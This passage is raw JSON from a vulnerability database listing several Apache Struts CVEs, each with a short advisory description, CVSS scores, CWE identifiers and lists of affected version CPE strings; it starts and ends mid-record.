"obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4386"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.0.0"], "id": "CVE-2012-4386", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4386", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-09T10:42:49", "description": "Apache Struts 2.x before 2.3.24.1 allows remote attackers to manipulate Struts internals, alter user sessions, or affect container settings via vectors involving a top object.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-08-29T15:29:00", "type": "cve", "title": "CVE-2015-5209", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2018-07-01T01:29:00", "cpe": ["cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.3.17", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.3.23", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.3.24", "cpe:/a:apache:struts:2.3.20", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.3.20.2", "cpe:/a:apache:struts:2.3.19", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.3.22", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.3.9", "cpe:/a:apache:struts:2.3.11", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.3.21", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.6", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.3.5", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.3.13", "cpe:/a:apache:struts:2.3.20.1", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.3.10", "cpe:/a:apache:struts:2.3.16.3"], "id": "CVE-2015-5209", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5209", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-12T09:19:23", "description": "Apache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix.", "cvss3": {}, "published": "2013-09-30T21:55:00", "type": "cve", "title": "CVE-2013-4310", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310"], "modified": "2014-05-05T05:25:00", "cpe": ["cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.2.3.1"], "id": "CVE-2013-4310", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4310", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-16T03:21:20", "description": "Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.", "cvss3": {}, "published": "2014-12-10T15:59:00", "type": "cve", "title": "CVE-2014-7809", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2018-10-09T19:53:00", "cpe": ["cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.3.16.3", "cpe:/a:apache:struts:2.0.2"], "id": "CVE-2014-7809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7809", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:33:30", "description": "Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-04-12T16:59:00", "type": "cve", "title": "CVE-2016-4003", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4003"], "modified": "2018-11-23T16:21:00", "cpe": ["cpe:/a:apache:struts:2.3.24.1"], "id": "CVE-2016-4003", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T00:50:04", "description": "Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.", "cvss3": {}, "published": "2011-05-13T17:05:00", "type": "cve", "title": "CVE-2011-1772", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1772"], "modified": "2012-01-19T03:57:00", "cpe": 